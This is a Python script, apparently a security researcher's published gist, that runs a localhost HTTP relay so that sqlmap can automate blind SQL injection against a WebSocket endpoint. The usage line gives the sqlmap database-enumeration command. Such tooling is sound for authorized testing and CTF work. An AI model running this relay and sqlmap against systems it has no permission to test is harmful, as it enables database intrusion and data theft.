Automating Blind SQL injection over WebSocket By @rayhan0x01
import sys | |
from http.server import SimpleHTTPRequestHandler | |
from socketserver import TCPServer | |
from urllib.parse import unquote, urlparse | |
from websocket import create_connection | |
# Write-up: https://github.com/rayhan0x01/rayhan0x01.github.io/blob/gh-pages/_posts/2021-04-02-blind-sqli-over-websocket-automation.md
# Usage: python3 mitm_websocket.py ws://localhost:8156/ws  then run  sqlmap -u "http://localhost:8081/?id=1" --batch --dbs
ws_server = sys.argv[1] | |
print("target = ", ws_server) | |
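def send_ws(payload):
    """Relay one query value to the WebSocket endpoint and return its reply.

    A fresh connection to the module-level ``ws_server`` is opened for every
    call and is always closed, even when ``send``/``recv`` raises, so a
    misbehaving endpoint cannot leak one socket per forwarded request.

    Args:
        payload: The raw, still URL-encoded value taken from the incoming
            HTTP query string.

    Returns:
        The first frame received after sending, or ``''`` when the endpoint
        answered with nothing / an empty frame.
    """
    ws = create_connection(ws_server)
    try:
        # If the server returns a response on connect, use below line
        #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here
        # For our case, format the payload in JSON. Double quotes are swapped
        # for single quotes so the value can sit inside the JSON string
        # literal below without terminating it. Backslashes and control
        # characters are not escaped, so a value containing them still yields
        # invalid JSON.
        message = unquote(payload).replace('"', '\'')
        data = '{"id":"%s"}' % message
        ws.send(data)
        resp = ws.recv()
    finally:
        ws.close()
    return resp if resp else ''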
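def middleware_server(host_port, content_type="text/plain"):
    """Serve a small HTTP front end that forwards each request's query value over WebSocket.

    Every GET is answered with status 200 and a body of ``content_type``:
    the text returned by :func:`send_ws` for everything after the first
    ``=`` in the query string, or a fixed notice when no value is present.

    Args:
        host_port: ``(host, port)`` tuple the listening socket binds to.
        content_type: Value sent in the ``Content-type`` header of every reply.

    This function blocks in ``serve_forever`` and only returns when it is
    interrupted; the listening socket is closed on the way out.
    """
    class CustomHandler(SimpleHTTPRequestHandler):
        def do_GET(self) -> None:
            self.send_response(200)
            # Everything after the first '=' is the value, so the remainder
            # of the query (including any further '&' pairs) is relayed as-is.
            try:
                payload = urlparse(self.path).query.split('=', 1)[1]
            except IndexError:
                payload = False
            if payload:
                content = send_ws(payload)
            else:
                content = 'No parameters specified!'
            self.send_header("Content-type", content_type)
            self.end_headers()
            self.wfile.write(content.encode())
            return

    class _TCPServer(TCPServer):
        # Allow an immediate restart on the same port without waiting for the
        # previous listening socket to leave TIME_WAIT.
        allow_reuse_address = True

    # The context manager runs server_close() when serve_forever is
    # interrupted, so the listening socket is not left open.
    with _TCPServer(host_port, CustomHandler) as httpd:
        httpd.serve_forever()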
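print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")
print('[+] Please run sqlmap -u "http://localhost:8081/?id=1" --batch --dbs')
try:
    # Bind to the loopback interface only: the banner above and the usage
    # note at the top of the file both address localhost, and a 0.0.0.0 bind
    # would let any host that can reach this machine relay requests to the
    # WebSocket target through this process.
    middleware_server(('127.0.0.1', 8081))
except KeyboardInterrupt:
    # Ctrl-C is the expected way to stop the relay; exit quietly.
    pass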